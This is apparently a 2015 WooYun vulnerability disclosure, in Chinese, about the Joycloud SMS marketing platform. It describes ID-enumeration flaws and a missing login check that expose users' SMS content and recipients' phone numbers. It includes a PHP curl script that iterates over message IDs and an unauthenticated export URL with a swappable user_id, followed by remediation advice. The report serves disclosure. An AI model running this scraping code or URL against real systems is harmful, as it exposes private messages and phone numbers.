时讯网卓云短信平台两处设计缺陷导致用户短信数据被任意遍历/下载

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0124294

漏洞标题：时讯网卓云短信平台两处设计缺陷导致用户短信数据被任意遍历/下载

漏洞作者：冰海

提交时间：2015-07-05 10:07

修复时间：2015-08-19 10:08

公开时间：2015-08-19 10:08

漏洞类型：设计缺陷/逻辑错误

危害等级：中

自评Rank：10

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-07-05：积极联系厂商并且等待厂商认领中，细节不对外公开
2015-08-19：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

卓云平台是中伟泰和科技有限公司于2013年开发的卓云第三代移动营销信息应用平台，这个平台拥有信息群发、手机报制作与发送，手机版网站（wap）网站制作与维护，用户信息回复，在线客服，在线支付，数据分析，二维码生成系统、APP、APK创建等功能，是时讯网多年研究所开创的一款无线应用全程服务平台。平台于2013年上线成功，引来众多企业热捧，目前已有多个企业合作。

详细说明：

目前卓云供用户使用的后台管理系统有两个，分别为：

http://www.joycloud.cn/

http://www.joycloud.cn:81/

1后台有一处可遍历短信数据的漏洞，2后台有一处可遍历下载所有用户短信发送记录的数据，相比较第一处更为严重。

漏洞证明：

1后台漏洞短信数据遍历漏洞：

在左侧点击"已发短信"——"任意查看一条短信"，如上图所示，url处id为短信内容参数，下方有短信送达人手机号，id参数未做校验，任意替换可查看其它用户短信数据。
遍历利用部分示例代码如下，可抓取到用户短信数据和短信送达人手机号：

$cookie = dirname(__FILE__).'/cookie.txt';
$post = array(
'login_url' => 'http://www.joycloud.cn/login.aspx',
'__VIEWSTATE' => '/wEPDwUKLTY5NxxxxxxxxxxxGZAjAmAt94zftoJa7rvw/Y=',
'__EVENTVALIDATION' => '/wEWBwLt+L+YBgK1jqKDDAKsjqKDDAKpjqxxxxxxxxxxxxxxxxxrGBn+sDdHp6dLOI6NOXeseuzQ3CH4T',
'utp' => '0',
'uid' => 'xxxxxxxx',
'pwd' => 'xxxxxxxx',
'Button1' => '1',
'loginsubmit' => '登录 Login',
);
$curl = curl_init('http://www.joycloud.cn/login.aspx');
curl_setopt($curl, CURLOPT_HEADER, 0);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_COOKIEJAR, $cookie); // ?Cookie
curl_setopt($curl, CURLOPT_POST, 1);
curl_setopt($curl, CURLOPT_POSTFIELDS, http_build_query($post));
curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
$result = curl_exec($curl);
curl_close($curl);
$url='http://www.joycloud.cn/smsview.aspx?id='.$smsId;
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_COOKIEFILE,$cookie);
$contents = curl_exec($ch);
eregi("<span id=\"ctl00_phContent_FormView1_contentLabel\">(.*)</span>

2后台短信数据遍历下载漏洞：

在"导出Excel"短信数据处抓包：

此处user_id参数为用户id，经测试此参数未和当前登录用户做校验，替换此参数后可下载其它用户短信数据，利用链接：

www.joycloud.cn:81/ashx/sms/Pagination_sms.ashx?indexNum=2&user_id=xxxx&StartTime=&endTime=&page=1&sousuo=

访问此链接，在不需要登录的情况下即可下载用户短信数据，此处为第三处漏洞，未做登录校验。
下载数据如下：

修复方案：

1.前两处短信遍历/下载漏洞都是参数未做校验导致的，需要对一处的短信id和二处的user_id进行权限校验；
2.下载短信数据处未做登录校验，可在未登录的情况下直接下载数据，需做登录校验，如cookie校验。

版权声明：转载请注明来源冰海@乌云

漏洞回应

厂商回应：

未能联系到厂商或者厂商积极拒绝

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0124294

漏洞标题：时讯网卓云短信平台两处设计缺陷导致用户短信数据被任意遍历/下载

相关厂商：卓云平台

漏洞作者：冰海

提交时间：2015-07-05 10:07

修复时间：2015-08-19 10:08

公开时间：2015-08-19 10:08

漏洞类型：设计缺陷/逻辑错误

危害等级：中

自评Rank：10

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源冰海@乌云

漏洞回应

厂商回应：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0124294

漏洞标题：时讯网卓云短信平台两处设计缺陷导致用户短信数据被任意遍历/下载

相关厂商：卓云平台

漏洞作者： 冰海

提交时间：2015-07-05 10:07

修复时间：2015-08-19 10:08

公开时间：2015-08-19 10:08

漏洞类型：设计缺陷/逻辑错误

危害等级：中

自评Rank：10

漏洞状态：未联系到厂商或者厂商积极忽略

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0124294"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 冰海@乌云

漏洞回应

厂商回应：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：冰海

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源冰海@乌云